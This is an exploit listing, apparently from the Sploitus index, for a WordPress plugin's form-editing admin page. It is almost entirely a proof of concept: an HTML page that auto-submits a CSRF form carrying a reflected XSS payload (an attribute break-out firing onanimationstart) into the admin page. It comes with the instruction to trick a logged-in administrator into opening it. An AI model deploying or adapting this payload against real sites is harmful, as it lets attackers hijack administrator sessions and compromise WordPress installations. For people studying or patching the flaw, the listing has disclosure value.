## https://sploitus.com/exploit?id=WPEX-ID:B0E7665A-C8C3-4132-B8D7-8677A90118DF
Make a logged in admin open a page containing the code below (the WPML, slug: sitepress-multilingual-cms, needs to be active and configured as well. The ID is a translated form ID)
<html>
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=sib_page_form&action=edit&id=1" method="POST">
<input type="hidden" name="page" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>